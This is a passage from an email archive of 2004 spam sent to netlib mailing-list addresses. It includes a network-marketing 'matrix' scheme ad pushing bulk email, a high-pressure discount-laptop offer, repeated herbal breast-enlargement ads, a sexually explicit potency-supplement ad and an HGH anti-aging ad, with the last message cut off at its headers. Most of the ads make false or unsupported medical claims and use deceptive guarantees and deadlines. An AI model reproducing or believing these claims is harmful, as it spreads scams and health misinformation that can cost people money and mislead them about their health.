<p><b><font face=3D"Arial,Helvetica">Sponsor ID: 1005</font></b></center>

<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D5 COLS=3D2 WIDTH=3D"60=
0" >
<tr>
<td WIDTH=3D"40%"><b><font face=3D"Arial,Helvetica">First Name</font></b><=
/td>

<td WIDTH=3D"60%"><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>=

</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Last Name</font></b></td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Mailing Address (line 1)</font></b><=
/td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Mailing Address (line 2)</font></b><=
/td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">City, State Zip</font></b></td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Country</font></b></td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Phone Number <font size=3D-1>(with a=
rea
code)</font></font></b></td>

<td><b><font face=3D"Arial,Helvetica">&nbsp;</font></b></td>
</tr>

<tr>
<td><b><font face=3D"Arial,Helvetica">Email Address <font size=3D-1>(requi=
red)</font></font></b></td>

<td>&nbsp;</td>
</tr>
</table></center>

<center><b><font face=3D"Arial,Helvetica"><font size=3D-1>Your set-up info=
rmation
will be sent to your email address upon receipt of your order</font></font=
></b>
<br>&nbsp;
<br>&nbsp;
<p><font face=3D"Arial,Helvetica">[Attach Check by Fax Here]</font></cente=
r>

<p><br>
<br>
<br>
<br>
<p>
<hr WIDTH=3D"80%">
<center><b><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font si=
ze=3D-1>THE
MONITORS OFFICE CONTACTS EVERY NEW MEMBER, INCLUDING YOU. THEY CONTACT YOU=
 TO
VERIFY THAT YOU UNDERSTAND HOW THE PROGRAM WORKS AND TO OFFER YOU ANY ASSI=
STANCE
REQUIRED.&nbsp; NO OTHER PROGRAM SPENDS THE TIME OR EXPENSE TO</font></fon=
t></font></b>
<br><b><font face=3D"Arial,Helvetica"><font color=3D"#3333FF"><font
size=3D=
-1>WELCOME
EVERY NEW MEMBER ONBOARD LIKE THIS ONE DOES</font></font></font></b></cent=
er>

<hr WIDTH=3D"80%">
<br>&nbsp;
<center><table BORDER CELLSPACING=3D0 CELLPADDING=3D10 COLS=3D1 WIDTH=3D"9=
0%" BGCOLOR=3D"#FFFFCC" >
<tr>
<td><b><font face=3D"Arial,Helvetica"><font size=3D-1>To be in compliance =
with
Federal Postal Laws (Title 18, Sections 1302/1341) network programs must
have a viable product or service to sell and someone to oversee the operat=
ion.</font></font></b>
<p><font face=3D"Arial,Helvetica"><font size=3D-1><b>The Service: </b>We p=
rovide
a fully automated, monitored program.&nbsp; We maintain a database of all
members, ensuring that our members adhere to-the rules.&nbsp; We provide
marketing and sales services as well as timely processing of our members
applications</font></font>
<p><font face=3D"Arial,Helvetica"><font size=3D-1><b>The Products: </b>Eac=
h
new member receves a step by step Instruction Book (Mastering the Matrix) =
that walks them through
the successful completion of this program.&nbsp; If you follow these easy
step by step instructions, <B>you will make Money.</B> The skills you lear=
n in Mastering the Matrix will work with any network program you ever part=
icipate in.  This book alone is worth more than the entrance fee into this=
 program</font></font></td>
</tr>
</table></center>
</td>
</tr>
</table></center>

<P><center><table BORDER CELLSPACING=3D0 CELLPADDING=3D10 COLS=3D1
WIDTH=3D=
"650" >
<tr>
<td BGCOLOR=3D"#FFFFFF">
<center><b><i><font face=3D"Arial,Helvetica"><font size=3D+2>OUR SUCCESS G=
UARANTEE</font></font></i></b>
<hr WIDTH=3D"80%"></center>
<font face=3D"Arial,Helvetica"><font size=3D-1>If you followed the step by=

step directions in our Instruction Book for success, and you still haven't=

picked up your 5 first level members. (<i>I can't imagine</i>)&nbsp; We
worked out a special deal with the marketing company below.&nbsp; They
will email your ad out to one million people for a highly reduced rate
and guarantee your performance.&nbsp; If after this mailing, you still
haven't filled your (5) first level members, they will continue to mail
your ad at no additional cost
<b>UNTIL YOU DO!</b> This is a special limited
time offer available only to the recipients of this email ad</font></font>=
</td>
</tr>
</table></center>

<P><center><table BORDER CELLSPACING=3D0 CELLPADDING=3D0 COLS=3D1 WIDTH=3D=
"650" BGCOLOR=3D"#FFFFCC" >
<tr>
<td>
<center><font face=3D"Arial,Helvetica">Bulk Email Marketing Services provi=
ded
by Rapidmail 2003</font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+3><font color=3D"#FF00=
00">EXPLODE
</font>Y<font color=3D"#000000">our
Profits</font></font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+2>With 24/7 Dedicated =
Bulk
Email Servers!</font></font></b>
<br>
<hr WIDTH=3D"80%">
<br><font face=3D"Arial,Helvetica"><font size=3D+3>Bulk Email can EXPLODE =
your
Profits!</font></font>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+1>Get a Dedicated Bulk =
Email
Server sending out your ad</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D+1>24 hours a day, 7 da=
ys
a week!</font></font></b>
<p><b><font face=3D"Arial,Helvetica"><font size=3D+3>Call 1-800-591-7751&n=
bsp;
ext:101</font></font></b></center>
</td>
</tr>
</table></center>
<A HREF=3D"http://www.herbalplus.us/out.html">Click Here to be removed</A>=

<br>&nbsp;
</body>
</html>
ebehu cq hrrxdiagd og ki
yjmkqxzs ffw  syepcyn fux
mzjt 
qol ct
 d

--A...0__.CE9E._70.9_--


From Administrator@techadvice.org Sun Jan  4 01:41:44 2004
Return-Path: <Administrator@techadvice.org>
Received: from oh-portsmouth3c-190.chlcoh.adelphia.net (oh-portsmouth3c-190.chlcoh.adelphia.net [68.168.191.190])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i046exMN021412;
	Sun, 4 Jan 2004 01:41:25 -0500 (EST)
Received: from ocatu.x5qzg.net [219.90.46.125] by oh-portsmouth3c-190.chlcoh.adelphia.net SMTP id O4j7oo38brP36f for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 04 Jan 2004 00:44:02 -0600
Message-ID: <8427fc2mrbl7dhl652-z70@6a9ks>
From: "Admin" <Administrator@techadvice.org>
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: ADV: Attention All  Staff and Personnel:
Date: Sun, 04 Jan 04 00:44:02 GMT
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="28_75AAB.E3D"

This is a multi-part message in MIME format.

--28_75AAB.E3D
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable

<html>

<head>
<meta http-equiv=3D"Content-Language" content=3D"en-us">
<meta name=3D"GENERATOR" content=3D"Microsoft FrontPage 5.0">
<meta name=3D"ProgId" content=3D"FrontPage.Editor.Document">
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Dwindows-=
1252">
<title>Attention All Staff</title>
</head>

<body>

<dl>
  <dt><font face=3D"Arial" size=3D"2"><b>Attention All Staff, Personnel, a=
nd 
  Students:<br>
  <br>
  <u>You must respond by 5 P.M. Tuesday, January 6, 2004</u></b><br>
  <br>
  Avtech Direct a leading computer manufacturer is offering a<br>
  limited allotment of <i><b>BRAND NEW,</b> </i>top of-the-line, <b>name-b=
rand<br>
  laptop computers at <font color=3D"#FF0000">50% off MSRP</font></b><font=
 color=3D"#FF0000">
  </font>to all: Who respond to</font></dt>
  <dt><font face=3D"Arial" size=3D"2">this message before:<u> <b>5 P.M. Tu=
esday, January 6, 2004</b><br>
  </u><br>
  <br>
  All laptops are brand-new packed in their original boxes and<br>
  come with a full manufacturer's warranty plus a<br>
  <b>100% satisfaction guarantee.</b><br>
  <br>
  These professional grade laptops are lightweight and fully<br>
  equipped with the next generation WiFi technology, making these<br>
  the very best performing computers that money can buy.<br>
  <br>
  Avtech Direct is offering these feature rich, top performing laptops<br>=

  with the latest Wireless technology at an amazing price<br>
  to all who call:<br>
  <br>
  <b>1-800-318-1388 by 5 P.M. Tuesday, January 6, 2004</b><br>
  <br>
  <i>Laptop AT-1000S Series- Sleek, Slim and Wireless Ready</i><br>
  <br>
  * 1 Giga Pro Transmeta Crusoe CPU for incredible power<br>
  * 128 MB SD RAM, Upgradeable to 256<br>
  * 20 GB Hard Drive upgradeable to 30 GB<br>
  * CD-Rom Drive upgradeable to DVD/CDRW <br>
  * WiFi Next Generation Wireless Technology for total freedom<br>
  * 14.1 XGA TFT Ultra Sharp Liquid Display<br>
  * Premium Sound and Video<br>
  * Total Connectivity 56k v90 fax modem, 10/100 T-base LAN Net Card <br>
  * 1394 Fire wire and USB 2.0 Ports<br>
  * Soft Touch Keyboard<br>
  * Internet and Network Ready<br>
  * Extra Long Life Battery Pack<br>
  * 1 Year parts and labor warranty with<br>
  * Priority customer service and tech support<br>
  <br>
  <b>MSRP $1299 ......................................... Your Cost $647</=
b><br>
  <br>
  <br>
  <i>Laptop AT-2000 Series Plenty of Power and Wireless Ready</i><br>
  <br>
  * 2.0 Intel Processor for outstanding speed and performance<br>
  * 256 MB SD RAM, Upgradeable to 512 MB<br>
  * CD Rewriteable and DVD Combo Drive<br>
  * 20 GB Hard Drive upgradeable to 40 GB<br>
  * WiFi Ready-Next Generation Wireless Technology for total freedom<br>
  * 15.1 XGA TFT Ultra Sharp Liquid Display<br>
  * Premium Sound and Video <br>
  * Total Connectivity 56k v90 fax modem, 10/100 T-base LAN Net Card<br>
  * 1394 Fire wire and USB 2.0 Ports<br>
  * Soft Touch Keyboard<br>
  * Internet and Network Ready<br>
  * Long Life Battery Pack<br>
  * 1 Year parts and labor warranty with<br>
  * Priority customer service and tech support<br>
  <br>
  <b>MSRP $1999 ......................................... Your Cost $947</=
b><br>
  <br>
  How to qualify:<br>
  <br>
  1. You must be a Teacher or Student or Medical Staff Member.<br>
  2. All laptop computers will be available on a<br>
  first come first serve basis.<br>
  3. <b><font color=3D"#FF0000">You must call 1-800-318-1388 by 5 P.M. Tue=
sday, January 6, 2004</font></b><br>
  and we will hold the laptops you request on will call. <br>
  4. You are not obligated in any way.<br>
  <u><b>5. All computers are 100% Satisfaction Guaranteed</b></u><br>
  <br>
  <br>
  <b>Call Avtech Direct 1-800-318-1388 by 5 P.M. Tuesday, January 6, 2004<=
/b><br>
  <br>
  If you would like to be removed,
  <a href=3D"http://www.techadvice.org/remove.htm">PLEASE CLICK HERE</a><b=
r>
&nbsp;</font></dt>
</dl>

</body>

</html>
--28_75AAB.E3D--


From greg@msn.com Sun Jan  4 01:51:10 2004
Return-Path: <greg@msn.com>
Received: from 160.36.58.108 ([211.237.234.16])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i046p6MN021594;
	Sun, 4 Jan 2004 01:51:07 -0500 (EST)
Received: from [154.182.243.226]
	by 160.36.58.108 SMTP id P013i1I33YcyAx
	for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 05 Jan 2004 01:44:19 +0500
Message-ID: <7y$7$73g$9s-3ph$-$e495$c$xnxa@896.i45q>
From: "Sondra Ferreira" <greg@msn.com>
Reply-To: "Sondra Ferreira" <greg@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Ladies beautiful breasts safely-- helpful societe trinidad
Date: Mon, 05 Jan 04 01:44:19 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="E.A6CA8BB.088D2AD"
X-Priority: 3
X-MSMail-Priority: Normal


--E.A6CA8BB.088D2AD
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>arouse........................................................=
..........................................aren't
<head>diluent
<title>musket</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.amyz.info/breast/?buster=
">This way to a new figure safely!</a></H2></center>
grover
</body>
</html>

--E.A6CA8BB.088D2AD--


From greg@msn.com Sun Jan  4 02:06:59 2004
Return-Path: <greg@msn.com>
Received: from c-66-176-118-168.se.client2.attbi.com (c-66-176-118-168.se.client2.attbi.com [66.176.118.168])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0476wMN021866;
	Sun, 4 Jan 2004 02:06:58 -0500 (EST)
Received: from [204.151.203.203]
	by c-66-176-118-168.se.client2.attbi.com id C6pyXD3P06UD;
	Sun, 04 Jan 2004 21:04:09 +0000
Message-ID: <n-$4$d-7-2by31@ewu4p1>
From: "Ben Crain" <greg@msn.com>
Reply-To: "Ben Crain" <greg@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Ladies beautiful breasts safely-- rostrum o'hare glom
Date: Sun, 04 Jan 04 21:04:09 GMT
X-Mailer: eGroups Message Poster
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="708.A3C.0B.9A..0BD0"
X-Priority: 3
X-MSMail-Priority: Normal


--708.A3C.0B.9A..0BD0
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>spatial........................................................=
..........................................recuse
<head>curfew
<title>demagnify</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.amyz.info/breast/?buster=
">This way to a new figure safely!</a></H2></center>
bulb
</body>
</html>

--708.A3C.0B.9A..0BD0--


From bcman@msn.com Sun Jan  4 02:09:43 2004
Return-Path: <bcman@msn.com>
Received: from 160.36.58.108 ([210.108.142.231])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0479dMN021902;
	Sun, 4 Jan 2004 02:09:41 -0500 (EST)
Received: from [42.204.133.132] by 160.36.58.108 with ESMTP id <179325-86610>; Sun, 04 Jan 2004 16:59:06 -0400
Message-ID: <kli-dwk9rfwb-2@5i6eg.q.y2.3vw>
From: "Darrell Lundy" <bcman@msn.com>
Reply-To: "Darrell Lundy" <bcman@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: You can have any woman -solicitude
Date: Sun, 04 Jan 04 16:59:06 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_1F_D6F_4D."
X-Priority: 3
X-MSMail-Priority: Normal


--_1F_D6F_4D.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>copeland
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.craigz.us/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
epochal--------------------------------------------------------------=
----------------------------------------concertmaster
</body>
</html>

--_1F_D6F_4D.--


From ftrd@msn.com Sun Jan  4 02:25:52 2004
Return-Path: <ftrd@msn.com>
Received: from LEGEND-MCD4KLCK ([218.242.157.248])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i047PgMN022134;
	Sun, 4 Jan 2004 02:25:46 -0500 (EST)
Received: from [22.181.89.54] by LEGEND-MCD4KLCK id bygSpmjHsVbC for <blast-funct-archive@netlib2.cs.utk.edu>; Mon, 05 Jan 2004 01:15:15 +0400
Message-ID: <9$0f$o76--$$-o268$e41e-a85j@pk8.5ulsb>
From: "Shawn Begay" <ftrd@msn.com>
Reply-To: "Shawn Begay" <ftrd@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Larger cup sizes ! Proven effective! ysnob
Date: Mon, 05 Jan 04 01:15:15 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_69E4E.891_.AFCE.E"
X-Priority: 3
X-MSMail-Priority: Normal


--_69E4E.891_.AFCE.E
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>abyssinia--------------------------------------------------------=
-------micronesia
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.amyz.info/breast/?buster=
">This way to a new figure safely!</a></H2></center>
inveigh
</body>
</html>

--_69E4E.891_.AFCE.E--


From bcman@msn.com Sun Jan  4 02:35:03 2004
Return-Path: <bcman@msn.com>
Received: from 200-207-17-204.dsl.telesp.net.br (200-207-17-204.dsl.telesp.net.br [200.207.17.204])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i047YfMN022231;
	Sun, 4 Jan 2004 02:34:49 -0500 (EST)
Received: from [163.38.230.109]
	by 200-207-17-204.dsl.telesp.net.br;
	Mon, 05 Jan 2004 02:25:23 +0500
Message-ID: <rw2g0h-4fafp$b-04@mpxiq.j9e>
From: "Carol Frey" <bcman@msn.com>
Reply-To: "Carol Frey" <bcman@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Astounding!! Bedroom sports!-bertie
Date: Mon, 05 Jan 04 02:25:23 GMT
X-Mailer: Internet Mail Service (5.5.2650.21)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="DA_05B71B.F8B0"
X-Priority: 3
X-MSMail-Priority: Normal


--DA_05B71B.F8B0
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>cowpunch
<head>
<title>Improve yourself thru research</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">

</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#000000" face=3D"verdana">You can be an ALL NIG=
HT sex machine</font></h3></center><center><h4><font color=3D"#FF0000" fac=
e=3D"verdana">Finally available to the public<br>The supplement that's mad=
e Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#000000" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>
     Before she can catch her breath, mount her again and again,<br> pleas=
uring her AND YOURSELF orgasm after orgasm after orgasm.<br><br>Porn Stars=
 shoot an entire movie in just ONE DAY having sex<br> many times with many=
 different women!<br>THEY WEREN'T BORN THAT WAY!<br>
    Now you too can have rock hard orgasmic sex over and over again<br>wit=
h huge cum gushing 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF0000" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#000000" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    She'll never leave you alone when you give her hours of multiple orgas=
ms<br>
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.craigz.us/alpha/?buster">Find Alpha Male Here</a></h=
2></center>
puppy--------------------------------------------------------------=
----------------------------------------barn
</body>
</html>

--DA_05B71B.F8B0--


From ftrd@msn.com Sun Jan  4 02:48:15 2004
Return-Path: <ftrd@msn.com>
Received: from 68.184.243.130.charter-stl.com (68.184.243.130.charter-stl.com [68.184.243.130])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i047mEMN022475;
	Sun, 4 Jan 2004 02:48:14 -0500 (EST)
Received: from (HELO o351bv1) [196.132.104.195] by 68.184.243.130.charter-stl.com for <blast-funct-archive@netlib2.cs.utk.edu>; Sun, 04 Jan 2004 16:39:39 -0500
Message-ID: <w-mc2q8i62x1b$-8@ntyss960.n2z>
From: "Lloyd Aguilar" <ftrd@msn.com>
Reply-To: "Lloyd Aguilar" <ftrd@msn.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: ''Improve your cup sizes! Medically proven! wicxhj
Date: Sun, 04 Jan 04 16:39:39 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="AAEBC.EBE_E..DC1BF00_CE"
X-Priority: 3
X-MSMail-Priority: Normal


--AAEBC.EBE_E..DC1BF00_CE
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>handclasp--------------------------------------------------------=
-------hirsute
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center><br><center><h2><a href=3D"http://www.amyz.info/breast/?buster=
">This way to a new figure safely!</a></H2></center>
contagious
</body>
</html>

--AAEBC.EBE_E..DC1BF00_CE--


From 35422g7h@yahoo.com Sun Jan  4 04:03:22 2004
Return-Path: <35422g7h@yahoo.com>
Received: from 12-207-198-215.client.attbi.com (12-207-198-215.client.attbi.com [12.207.198.215])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i04937MN025938;
	Sun, 4 Jan 2004 04:03:12 -0500 (EST)
Received: from [3.241.216.38] by 12-207-198-215.client.attbi.com with ESMTP id BFFF0D9AF8F; Sun, 04 Jan 2004 08:58:35 +0000
Message-ID: <qc$-xd4cg8ka13@i4il.8.2v11>
From: "Louisa Mccabe" <35422g7h@yahoo.com>
Reply-To: "Louisa Mccabe" <35422g7h@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: If ..it's good enough for a president,,,, it's good enough for me!!
Date: Sun, 04 Jan 04 08:58:35 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="7B..AA6B61BBD_"
X-Priority: 3
X-MSMail-Priority: Normal


--7B..AA6B61BBD_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>orwell
<head>
<title>Untitled Document</title>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1">
</head>

<body bgcolor=3D"#FFFFFF" text=3D"#FF00FF" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FF0000" face=3D"verdana">Bob Hope, JFK, Marily=
n Monroe, Wayne Newton, Dick Clark, <br>
    Queen Elizabeth, George Burns, Cher, Rod Stewart <br>
     Celebrities, Politicians, Athletes, and even Doctors</font></h3></cen=
ter><center><h5><font color=3D"#000000" face=3D"verdana">They look SO GOOD=
 at their age !  HGH is the answer !<br>HGH helps them to "be the best" th=
ey could possibly be !<br>HGH is recognized around the world as the<br> "h=
ormone to replace"<br> to combat the adverse affects of aging.<br>It is a =
documented truth.<br>  Celebrities and politicians have used, and ARE USIN=
G,,<Br> HGH <br> to prolong their  minds,<br> their creative abilities, an=
d  to prolong healthy lives.<br>HGH has been proven to be "solely responsi=
ble" in the maintenance of their youthful<br>"movie star good looks" decad=
es beyond those that have yet to discover HGH ! <br><br>Ever wonder how ce=
rtain celebrities manage to look so young and stay 
    so fit at their age??</font></h5>
</center><center><h3><font color=3D"#FF0000" face=3D"verdana">HGH is the g=
uaranteed answer !<br>With a 100% Money Back Guarantee !</font></h3></cent=
er><br><center><H4><font color=3D"#FF00FF" face=3D"verdana"><a href=3D"htt=
p://www.amyz.info/hgh/?buster">Now available and very much affordable for =
you !<br>Learn More Right Here</a></font></h4></center>
bulrush
</body>

--7B..AA6B61BBD_--


From 35422g7h@yahoo.com Sun Jan  4 04:22:44 2004
Return-Path: <35422g7h@yahoo.com>
Received: from 160.36.58.108 ([211.209.249.137])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i049MeMN026167;
	Sun, 4 Jan 2004 04:22:41 -0500 (EST)
Received: from [128.249.83.151] by 160.36.58.108; Sun, 04 Jan 2004 04:18:00 -0500
Message-ID: <5l54560j3$-s9$o1j@pvs8501tm6g12>
From: "Madeline Presley" <35422g7h@yahoo.com>
Reply-To: "Madeline Presley" <35422g7h@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: You.tried diets and workouts, add this and be amazed!!
Date: Sun, 04 Jan 04 04:18:00 GMT
